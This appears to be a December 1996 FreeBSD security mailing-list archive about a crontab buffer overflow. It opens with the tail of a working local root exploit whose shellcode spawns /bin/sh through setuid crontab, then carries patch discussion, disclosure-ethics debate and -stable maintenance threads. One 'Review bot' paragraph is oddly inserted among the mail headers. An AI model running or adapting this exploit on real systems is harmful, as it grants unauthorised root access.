E-mail: leshka@leshka.chuvashia.su */ > > #include > main() > { > #define length 353 > int i,j; > unsigned long start_addr; > char *env[]={NULL}; > char param_string[length]; > char code_string[]= > { > "\xeb\x2a" /* jmp cont */ > > /* geteip: */ "\x5d" /* popl %ebp */ > "\x55" /* pushl %ebp */ > "\xfe\x4d\xe7" /* decb 0xffffffe7(%ebp) */ > "\xfe\x4d\xeb" /* decb 0xffffffeb(%ebp) */ > "\xfe\x4d\xec" /* decb 0xffffffec(%ebp) */ > "\xfe\x4d\xed" /* decb 0xffffffed(%ebp) */ > "\xff\x45\xef" /* incl 0xffffffef(%ebp) */ > "\xfe\x4d\xf4" /* decb 0xfffffff4(%ebp) */ > "\xc3" /* ret */ > > /* 0xffffffe0(%ebp): */ "/bin/sh" > /* 0xffffffe7(%ebp): */ "\x01" > > /* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */ > "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */ > > /* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */ > "\xe8\xcb\xff\xff\xff" /* call geteip */ > "\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */ > "\x55" /* pushl %ebp */ > "\x55" /* pushl %ebp */ > "\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */ > "\x55" /* pushl %ebp */ > "\xe8\xd4\xff\xff\xff" /* call execve */ > }; > > for(i=0;i start_addr=0xefbfddf0; > *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr; > strncpy(¶m_string[200],code_string,strlen(code_string)); > *( (unsigned long*) ¶m_string[348])= start_addr; > > execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL); > > } > /* ---------------------------- CUT HERE ----------------------------------- */ > > From owner-freebsd-security Mon Dec 16 14:06:17 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA06975 for security-outgoing; Mon, 16 Dec 1996 14:06:17 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id OAA06968 for ; Mon, 16 Dec 1996 14:06:10 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vZlAD-0005R6-00; Mon, 
16 Dec 1996 15:05:33 -0700
To: Marc Slemko
Subject: Re: why is -stable not secure?
Cc: Adam Kubicki , freebsd-security@freebsd.org
In-reply-to: Your message of "Mon, 16 Dec 1996 12:18:39 MST."
References:
Date: Mon, 16 Dec 1996 15:05:32 -0700
From: Warner Losh
Message-Id:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message Marc Slemko writes:
: Because no one has put them there. They can be there the second after
: they are in -current if they are put there; that happens when the person
: committing them feels confident enough in the patch and has the time to.

Likely because no one is comfortable enough making blind commits to the -stable branch. I've put a few deltas into the stable branch, but only after finding people to test them. It is much harder than it would appear.

-stable is dead dead dead dead. (the CVS branch based on 2.1.x, that is). If you are worried about security, running 2.2 when it is released may be your best bet.

wish I had better news :-(

Warner

From owner-freebsd-security Mon Dec 16 14:07:30 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA07037 for security-outgoing; Mon, 16 Dec 1996 14:07:30 -0800 (PST)
Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id OAA07030 for ; Mon, 16 Dec 1996 14:07:23 -0800 (PST)
Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vZlBl-0005RR-00; Mon, 16 Dec 1996 15:07:09 -0700
To: Doug Kwan ~{9XUq5B~}
Subject: Re: mail bomb!
Cc: Petri Helenius , security@freebsd.org
In-reply-to: Your message of "Mon, 16 Dec 1996 16:45:03 +0800."
References:
Date: Mon, 16 Dec 1996 15:07:09 -0700
From: Warner Losh
Message-Id:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message Doug Kwan ~{9XUq5B~} writes:
: Most ISP's have customers who are not computer gurus. Asking them
: to use PGP to verify all our messages would not be a good idea. Anyway
: we would take your advice to digitally sign all our messages.

However, if you do sign all the messages, then you could filter all those not signed by the right key. The users needn't know which ones are good or bad, or how to use pgp even. It would be a big clue to sendmail to filter out messages based on content (if it can do that).

Warner

From owner-freebsd-security Mon Dec 16 14:13:34 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA07691 for security-outgoing; Mon, 16 Dec 1996 14:13:34 -0800 (PST)
Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id OAA07672 for ; Mon, 16 Dec 1996 14:13:29 -0800 (PST)
Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vZlHM-0005SA-00; Mon, 16 Dec 1996 15:12:56 -0700
To: Richard Wackerbarth
Subject: Re: crontab security hole exploit
Cc: Joakim Rastberg , security@freebsd.org
In-reply-to: Your message of "Mon, 16 Dec 1996 09:14:25 CST."
References:
Date: Mon, 16 Dec 1996 15:12:55 -0700
From: Warner Losh
Message-Id:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message Richard Wackerbarth writes:
: An interesting perspective.
: My attitude is that it is better to have obscurity than having the exploit
: readily available to a wide audience. I realize that the truly good
: crackers can figure it out for themself. But there are many "children" who
: will try something when it is handed to them. IMHO, we should at least give
: the upper hand to the sysops and, if possible, provide the fix before the
: attack becomes widespread.

Yes, but 99.999% of all the exploits that have been posted to this list first appeared in bugtraq or best-of-security. Nothing new is generally revealed.

Now then, if I find a way to crack program xxx, then I should quietly send mail to the authors (or the BSD distributions) with this information. If I'm just passing along a well known hole, then everybody likely already knows about it.

Besides, you can easily find lots of holes in lots of programs for the small price of downloading OpenBSD's CVS tree. They have fixed boatloads of these things, some of which have been merged into FreeBSD, but many of which have not.

Warner

From owner-freebsd-security Mon Dec 16 14:16:42 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA07938 for security-outgoing; Mon, 16 Dec 1996 14:16:42 -0800 (PST)
Received: from www.trifecta.com (www.trifecta.com [206.245.150.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA07892 for ; Mon, 16 Dec 1996 14:16:30 -0800 (PST)
Received: (from dev@localhost) by www.trifecta.com (8.7.5/8.6.12) id RAA24622; Mon, 16 Dec 1996 17:16:30 -0500 (EST)
Date: Mon, 16 Dec 1996 17:16:30 -0500 (EST)
From: Dev Chanchani
To: Brian Tao
cc: FREEBSD-SECURITY-L
Subject: Re: URGENT: Packet sniffer found on my system
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 10 Dec 1996, Brian Tao wrote:

> > Expire all the passwords and re-install all the system binaries and
> > hopefully he will go away.
>
> All staff have been notified to cycle their passwords. What to do
> with the user base is an entirely different matter...

Regarding the attack on your system. Having commercial accounts is a pain in this case if their passwords have been sniffed. If you show signs you are on to the hacker, he will probably go away. If it is feasible, I would expire the users' accounts and just say it is policy at the end of the year :)

From owner-freebsd-security Mon Dec 16 14:16:54 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA07996 for security-outgoing; Mon, 16 Dec 1996 14:16:54 -0800 (PST)
Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id OAA07897; Mon, 16 Dec 1996 14:16:31 -0800 (PST)
Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vZlKO-0005ST-00; Mon, 16 Dec 1996 15:16:04 -0700
To: Marc Slemko
Subject: Re: crontab security hole
Cc: Dmitry Valdov , freebsd-bugs@freebsd.org, freebsd-security@freebsd.org
In-reply-to: Your message of "Mon, 16 Dec 1996 06:51:33 MST."
References:
Date: Mon, 16 Dec 1996 15:16:04 -0700
From: Warner Losh
Message-Id:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message Marc Slemko writes:
: It was fixed in -stable the other day by pst. The patch, pulled
: from the CVS tree, follows.
:
: Index: cron/database.c : =================================================================== : RCS file: /usr/cvs/src/usr.sbin/cron/cron/database.c,v : retrieving revision 1.1.1.1 : retrieving revision 1.1.1.1.6.1 : diff -c -r1.1.1.1 -r1.1.1.1.6.1 : *** database.c 1994/08/27 13:43:03 1.1.1.1 : --- database.c 1996/12/15 20:37:47 1.1.1.1.6.1 : *************** : *** 112,119 **** : if (dp->d_name[0] == '.') : continue; : : ! (void) strcpy(fname, dp->d_name); : ! sprintf(tabname, CRON_TAB(fname)); : : process_crontab(fname, fname, tabname, : &statbuf, &new_db, old_db); : --- 112,119 ---- : if (dp->d_name[0] == '.') : continue; : : ! (void)snprintf(fname, sizeof fname, "%s", dp->d_name); : ! (void)snprintf(tabname, sizeof tabname, CRON_TAB(fname)); strncpy(fname, dp->d_name, sizeof(fname)-1 ); fname[sizeof(fname)-1] = '\0'; strncpy(tabname, CRON_TAB(fname), sizeof(tabname)-1 ); tabname[sizeof(tabname)-1] = '\0'; : process_crontab(fname, fname, tabname, : &statbuf, &new_db, old_db); ... etc ...

would be a better fix since that doesn't involve stdio...

Warner

From owner-freebsd-security Mon Dec 16 14:42:32 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id OAA10092 for security-outgoing; Mon, 16 Dec 1996 14:42:32 -0800 (PST)
Received: from gdi.uoregon.edu (cisco-ts12-line3.uoregon.edu [128.223.150.135]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id OAA10076; Mon, 16 Dec 1996 14:42:27 -0800 (PST)
Received: from localhost (dwhite@localhost) by gdi.uoregon.edu (8.8.2/8.6.12) with SMTP id OAA00553; Mon, 16 Dec 1996 14:42:18 -0800 (PST)
Date: Mon, 16 Dec 1996 14:42:18 -0800 (PST)
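Review bot: in the `--- 112,119 ----` side of the database.c hunk quoted above, both new `snprintf` calls throw away their return value with `(void)`, so a spool directory entry longer than `fname` is silently cut short and the truncated name is then passed on to `process_crontab(fname, fname, tabname, ...)`; compare the return value against `sizeof fname` (and likewise `sizeof tabname`) and skip or log the entry when it does not fit, since a truncated name no longer refers to the file that was actually found. It is also worth confirming that `CRON_TAB(fname)` expands to a string-literal format plus its arguments, because it sits in the format position of `(void)snprintf(tabname, sizeof tabname, CRON_TAB(fname));` and the same hunk shows it used identically with `sprintf` before the change; the fix only closes the overflow if the format itself is a literal.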
From: Doug White
Reply-To: dwhite@resnet.uoregon.edu
To: Mun Fai WONG
cc: questions@freebsd.org, security@freebsd.org
Subject: Re: FreeBSD vs BorderWare
In-Reply-To: <32b5c1243534002@molhub.mol.net.my>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

The security list could probably comment on this better than I.

On Mon, 16 Dec 1996, Mun Fai WONG wrote:

> I am given the opportunity to propose an Internet gateway/server with
> security features in the form of a firewall mechanism. The prospective
> customers seem to be more keen on BorderWare as the solution for the
> following reasons:
>
> 1) It is based on a secured OS philosophy

Ditto here. Reference the numerous CERT warnings put forward by the FreeBSD group, willingly, to fix 4.4-Lite problems.

> 2) It is "commercially" backed by the vendor

FreeBSD is backed by the vendor... the question is the support line. I'll bet we'll answer you faster than BorderWare could ever hope to. And it's free (less cost of Internet access).

> 3) It has been tested

FreeBSD is tested all around the world by organizations great and small, in addition to the rigorous developmental and pre-release testing. In addition, many of the security tools are available from vendors who release software for other OSs and architectures (fwtk comes to mind).

> 4) Availability of the source to the modified kernel is impossible compared
> to FreeBSD as FreeBSD is a very "open" software distribution with source
> codes freely available.

So? What's so bad about that? Thousands of people around the world can look at the guts of FreeBSD? What's so insecure about that? If there's a problem, someone will notice it and submit a fix. With commercial applications, there may be a problem, but you won't be able to find where and how to fix it because you won't know the actual root of the problem. If there's a problem with FreeBSD, you can find it, fix it, submit the patch, and see the patch reviewed, committed, and a fix or workaround available in a short amount of time. With commercial software, you're waiting for the next release, which could be months away.

> 5) It does VPN, NAT and Secured Server Network (SSN, vs DMZ)

Add-on tools can implement NAT, but the others I'm not so sure about since I'm not a serious security guru.

> So, I really would like to get a frank opinion/experience/suggestions on how
> people rate FreeBSD 2.1 onwards against BorderWare etc in terms of security
> features.

The security list (and even -isp) can give you reactions.

Hope this note helps. You have the common misconception that commercial implementations are inherently 'better' than publicly available ones -- a misconception that you need to dispel.

Doug White | University of Oregon
Internet: dwhite@resnet.uoregon.edu | Residence Networking Assistant
http://gladstone.uoregon.edu/~dwhite | Computer Science Major

From owner-freebsd-security Mon Dec 16 15:19:11 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA12930 for security-outgoing; Mon, 16 Dec 1996 15:19:11 -0800 (PST)
Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA12924 for ; Mon, 16 Dec 1996 15:19:05 -0800 (PST)
Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <17565(3)>; Mon, 16 Dec 1996 15:18:20 PST
Received: from localhost ([127.0.0.1]) by crevenia.parc.xerox.com with SMTP id <177711>; Mon, 16 Dec 1996 15:18:16 -0800
X-Mailer: exmh version 1.6.9 8/22/96
To: Jim Binkley
cc: freebsd-security@freebsd.org
Subject: Re: Risk of having bpf0?
In-reply-to: Your message of "Thu, 12 Dec 1996 09:03:43 PST." <199612121703.JAA11713@sirius.cs.pdx.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Mon, 16 Dec 1996 15:18:10 PST
From: Bill Fenner Message-Id: <96Dec16.151816pst.177711@crevenia.parc.xerox.com> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <199612121703.JAA11713@sirius.cs.pdx.edu>you write: >question: does rarpd turn i/fs on in promiscuous mode? No. So no need for the rant =) Bill From owner-freebsd-security Mon Dec 16 15:31:52 1996 Return-Path: Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA13688 for security-outgoing; Mon, 16 Dec 1996 15:31:52 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA13683 for ; Mon, 16 Dec 1996 15:31:48 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id SAA10241; Mon, 16 Dec 1996 18:27:00 -0500 
From: Adam Shostack
Message-Id: <199612162327.SAA10241@homeport.org>
Subject: Re: crontab security hole exploit
In-Reply-To: <199612161810.TAA03636@tiger.cert.dfn.de> from Wolfgang Ley at "Dec 16, 96 07:10:11 pm"
To: ley@cert.dfn.de (Wolfgang Ley)
Date: Mon, 16 Dec 1996 18:26:05 -0500 (EST)
Cc: craig@ProGroup.COM, security@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL27 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Wolfgang Ley wrote:

| > Is there someplace or some book that someone who is writing new software can
| > refer to for learning how to write secure code in the first place? I
| > certainly don't want to ask some whiny security cop for each and every
| > little detail.... :)
|
| You might want to check the "Secure Programming Checklist" which is
| a collection of the suggestions from the "Practical UNIX and Internet
| Security" book and a paper from AUSCERT.
|
| ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist

I'll be egotistical and suggest my code review guidelines; they talk about what to look for in a review, and how to write code that will pass one.

http://www.homeport.org/~adam/review.html

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From owner-freebsd-security Mon Dec 16 15:39:03 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id PAA14515 for security-outgoing; Mon, 16 Dec 1996 15:39:03 -0800 (PST)
Received: from postoffice.cso.uiuc.edu (postoffice.cso.uiuc.edu [128.174.5.11]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id PAA14507 for ; Mon, 16 Dec 1996 15:38:58 -0800 (PST)
Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by postoffice.cso.uiuc.edu (8.6.12/8.6.12) with ESMTP id RAA134396; Mon, 16 Dec 1996 17:38:52 -0600
Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) id RAA22656; Mon, 16 Dec 1996 17:37:35 -0600
From: igor@alecto.physics.uiuc.edu (Igor Roshchin)
Message-Id: <199612162337.RAA22656@alecto.physics.uiuc.edu>
Subject: Re: mail bomb!
To: imp@village.org (Warner Losh)
Date: Mon, 16 Dec 1996 17:37:35 -0600 (CST)
Cc: ctkwan@cs.hku.hk, pete@sms.fi, security@freebsd.org
In-Reply-To: from "Warner Losh" at Dec 16, 96 03:07:09 pm
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>
> In message Doug Kwan writes:
> : Most ISP's have customers who are not computer gurus. Asking them
> : to use PGP to verify all our messages would not be a good idea. Anyway
> : we would take your advice to digitally sign all our messages.
>
> However, if you do sign all the messages, then you could filter all
> those not signed by the right key. The users needn't know which ones
> are good or bad, or how to use pgp even. It would be a big clue to
> sendmail to filter out messages based on content (if it can do that).
>
> Warner
>

I did not check that, but probably procmail can do the "sorting" job, passing through messages from the administration that are signed with the right PGP key and sending the rest to /dev/null.

IgoR aka StR

From owner-freebsd-security Mon Dec 16 16:33:20 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id QAA19039 for security-outgoing; Mon, 16 Dec 1996 16:33:20 -0800 (PST)
Received: from roundtable.cif.rochester.edu (roundtable.cif.rochester.edu [128.151.220.14]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id QAA19032 for ; Mon, 16 Dec 1996 16:33:17 -0800 (PST)
Received: (from sadmin@localhost) by roundtable.cif.rochester.edu (8.8.3/8.8.3) id TAA02446 for freebsd-security@freebsd.org; Mon, 16 Dec 1996 19:32:50 -0500 (EST)
From: Security Administrator
Message-Id: <199612170032.TAA02446@roundtable.cif.rochester.edu>
Subject: crontab exploit
To: freebsd-security@freebsd.org (FreeBSD Security)
Date: Mon, 16 Dec 1996 19:32:50 -0500 (EST)
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

12-16-96

I apologize for coming into this discussion just as it seems to be ending, but I was wondering if someone could email me the exploit to which everyone is referring in their letters. I just got onto the freebsd-security mailing list, and I think I missed the original exploit posting by a day or so.

Thanks,
Josh Pincus.

--
System Security Administrator
Computer Interest Floor
University of Rochester
Rochester, NY 14627
sadmin@roundtable.cif.rochester.edu

From owner-freebsd-security Mon Dec 16 17:36:36 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id RAA23086 for security-outgoing; Mon, 16 Dec 1996 17:36:36 -0800 (PST)
Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id RAA23081 for ; Mon, 16 Dec 1996 17:36:33 -0800 (PST)
Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.4/8.6.10) with SMTP id RAA21872; Mon, 16 Dec 1996 17:33:42 -0800 (PST)
From: Cy Schubert - ITSD Open Systems Group
Message-Id: <199612170133.RAA21872@passer.osg.gov.bc.ca>
X-Authentication-Warning: passer.osg.gov.bc.ca: 15005@localhost [127.0.0.1] didn't use HELO protocol
Reply-to: cschuber@uumail.gov.bc.ca
X-Mailer: MH
X-Sender: cschuber
To: Warner Losh
cc: Marc Slemko , Adam Kubicki , freebsd-security@freebsd.org
Subject: Re: why is -stable not secure?
In-reply-to: Your message of "Mon, 16 Dec 96 15:05:32 MST."
Date: Mon, 16 Dec 96 17:33:41 -0800
X-Mts: smtp
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> In message Marc Slemko writes:
> : Because no one has put them there. They can be there the second after
> : they are in -current if they are put there; that happens when the person
> : committing them feels confident enough in the patch and has the time to.
>
> Likely because no one is comfortable enough making blind commits to
> the -stable branch. I've put a few deltas into the stable branch, but
> only after finding people to test them. It is much harder than it
> would appear.
>
> -stable is dead dead dead dead. (the CVS branch based on 2.1.x that
> is). If you are worried about security, running 2.2 when it is
> released may be your best bet.

When will 2.2 be out?

Regards,                       Phone:    (250)387-8437
Cy Schubert                    OV/VM:    BCSC02(CSCHUBER)
Open Systems Support           BITNET:   CSCHUBER@BCSC02.BITNET
ITSD                           Internet: cschuber@uumail.gov.bc.ca
                                         cschuber@bcsc02.gov.bc.ca

"Quit spooling around, JES do it."
From owner-freebsd-security Mon Dec 16 18:04:13 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id SAA24658 for security-outgoing; Mon, 16 Dec 1996 18:04:13 -0800 (PST)
Received: from selkirk.csrv.nidc.edu (selkirk.csrv.nidc.edu [192.133.128.10]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id SAA24651 for ; Mon, 16 Dec 1996 18:04:10 -0800 (PST)
Received: by selkirk.csrv.nidc.edu (1.38.193.5/16.2) id AA05750; Mon, 16 Dec 1996 18:05:10 -0800
Date: Mon, 16 Dec 1996 18:05:10 -0800 (PST)
From: Mark Nottage
To: security@freefall.freebsd.org
In-Reply-To: <199612162339.PAA14524@freefall.freebsd.org>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

info
help
//end

From owner-freebsd-security Mon Dec 16 18:20:20 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id SAA25890 for security-outgoing; Mon, 16 Dec 1996 18:20:20 -0800 (PST)
Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id SAA25866; Mon, 16 Dec 1996 18:20:16 -0800 (PST)
Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id TAA01403; Mon, 16 Dec 1996 19:19:53 -0700 (MST)
Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id TAA11581; Mon, 16 Dec 1996 19:19:38 -0700 (MST)
Date: Mon, 16 Dec 1996 19:19:38 -0700 (MST)
From: Marc Slemko
X-Sender: marcs@alive.ampr.ab.ca
To: Warner Losh
cc: freebsd-security@freebsd.org, stable@freebsd.org
Subject: Re: why is -stable not secure?
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

[this may be the start of a nice long useless discussion that has been gone through 100x before; please followup only to the -stable list and NOT to freebsd-security. No, this spew isn't all a response to what Warner has said since he is just echoing reality but is a response to the way things seem to be and where I think it would be nice if they would be.]

On Mon, 16 Dec 1996, Warner Losh wrote:

> In message Marc Slemko writes:
> : Because no one has put them there. They can be there the second after
> : they are in -current if they are put there; that happens when the person
> : committing them feels confident enough in the patch and has the time to.
>
> Likely because no one is comfortable enough making blind commits to
> the -stable branch. I've put a few deltas into the stable branch, but
> only after finding people to test them. It is much harder than it
> would appear.
>
> -stable is dead dead dead dead. (the CVS branch based on 2.1.x that
> is). If you are worried about security, running 2.2 when it is
> released may be your best bet.
>
> wish I had better news :-(

This discussion was bound to come up. It has before, it will again; perhaps about 2.2 next time.

Several points:

- from a developer's perspective, -stable has been dead for a long time. To some degree it has held back -current development and has resulted in the development version getting too far away from the latest release. This is bad.

- from an admin's perspective, -stable is far from dead. There isn't even another release out yet; how can it be dead? We need something to run on our servers. If it were typical MicroSoft junk we may need to upgrade to try to make it work, but -stable works. Very very well. Too well to upgrade to 2.2 until it is proven. The first 2.2 release will have more bugs than -stable has now. More features, but more bugs; they will get worked out, but not overnight. Many people are using FreeBSD for servers because they see it as having more stability over time than the L word. For the people using -stable in a server features don't matter. Minor (in that they are a few lines of code, not that they are unimportant) security fixes are important.

- There are many around who could maintain their own local security and serious bug fixes for -stable; many already do. I think there are a significant number of people to whom things like security patches to -stable are of importance.

- For a long time -stable was treated very carefully because, well, it is supposed to be stable. That caution was warranted and, to a large degree, still is. However, I think that perhaps at this point in -stable's life people should become less concerned about breaking the -stable tree if that means they are more willing to commit to it.

Put all these things together, and I think it is worthwhile to keep minimal support for -stable going. Not normal bugfixes, but things like significant security holes.

So I think the questions are:

- how many existing committers are there that are willing to commit fixes to -stable?

- if there isn't enough support on the existing team of committers (and I can certainly understand why that may be the case) for important patches to make it to -stable without special "outside" effort, would it help if someone took the role of "-stable patch dude"? He would take submissions and track -current changes for patches which should be backported to -stable and submit them in a nice, easy to commit, well tested format to an existing committer willing to deal with -stable at that level. If this is necessary, I would be willing to try doing something if no one more suitable is found.

- if not, who will be the first to start a separate repository of either -stable patches or a full -stable with patches source tree?

I realize that most developers want to let -stable die, and agree with their reasons for doing so. However, I have trouble with simply killing it with no alternatives present.

From owner-freebsd-security Mon Dec 16 19:37:12 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id TAA23007 for security-outgoing; Mon, 16 Dec 1996 19:37:12 -0800 (PST)
Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id TAA23000 for ; Mon, 16 Dec 1996 19:37:08 -0800 (PST)
Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id WAA11071; Mon, 16 Dec 1996 22:33:10 -0500
From: Adam Shostack
Message-Id: <199612170333.WAA11071@homeport.org>
Subject: Re: crontab security hole exploit
In-Reply-To: from adam at "Dec 16, 96 06:26:05 pm"
To: adam@lighthouse.homeport.org.noname (adam)
Date: Mon, 16 Dec 1996 22:32:16 -0500 (EST)
Cc: security@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL27 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

| I'll be egotistical and suggest my code review guidelines;
| they talk about what to look for in a review, and how to write code
| that will pass one.
|
| http://www.homeport.org/~adam/review.html

About 30 seconds after I wrote this, I made a really silly mistake and blew away my public_html directory. It's now back from tape.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
                                                       -Hume

From owner-freebsd-security Mon Dec 16 20:48:01 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id UAA26821 for security-outgoing; Mon, 16 Dec 1996 20:48:01 -0800 (PST)
Received: from bitbucket.edmweb.com (bitbucket.edmweb.com [204.244.190.9]) by freefall.freebsd.org (8.8.4/8.8.4) with SMTP id UAA26801 for ; Mon, 16 Dec 1996 20:47:56 -0800 (PST)
Received: (from steve@localhost) by bitbucket.edmweb.com (8.6.12/8.6.12) id UAA02849; Mon, 16 Dec 1996 20:47:43 -0800
Date: Mon, 16 Dec 1996 20:47:40 -0800 (PST)
From: Steve Reid
To: Richard Wackerbarth
cc: Joakim Rastberg , security@freebsd.org
Subject: Re: crontab security hole exploit
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

> My attitude is that it is better to have obscurity than having the exploit
> readily available to a wide audience. I realize that the truly good
> crackers can figure it out for themselves. But there are many "children" who
> will try something when it is handed to them. IMHO, we should at least give
> the upper hand to the sysops and, if possible, provide the fix before the
> attack becomes widespread.

Consider: The SYN-flooding bug in TCP has been known about for _years_. When did OS vendors start including measures to strengthen the kernel against such attacks? Immediately after 2600 and Phrack published exploits. The OS vendors seem to wait until those "children" get their hands on the exploits before they consider the holes important enough to fix.

On the other hand: SYN flooding is a denial of service attack, and you _know_ when you've been hit. AFAIK, it never happened (except as an experiment) before the exploits were published, and when it started happening the OS vendors (even MS!) scrambled to the rescue. With buffer overruns and such, you may never know that you've been broken into, so you want to get it fixed before the exploits start happening. I'm sure many such bugs are fixed quietly by the vendors, long before exploits are released.

Also, does it really help much to fix crontab, when you can bet your bottom dollar that there are still security problems with sendmail?

My personal feeling: You shouldn't post an exploit script publicly unless you have a fix, even if it's only a temporary fix until the vendors can release something better. Removing the suid bit from crontab is at worst a temporary inconvenience to your users, so IMHO that qualifies as a temporary fix. If you send a problem report to the vendor and weeks pass without results, then go ahead and post the exploit.

From owner-freebsd-security Tue Dec 17 00:26:36 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id AAA08173 for security-outgoing; Tue, 17 Dec 1996 00:26:36 -0800 (PST)
Received: from server.fasts.com (root@server.fasts.com [199.125.215.66]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id AAA08164 for ; Tue, 17 Dec 1996 00:26:31 -0800 (PST)
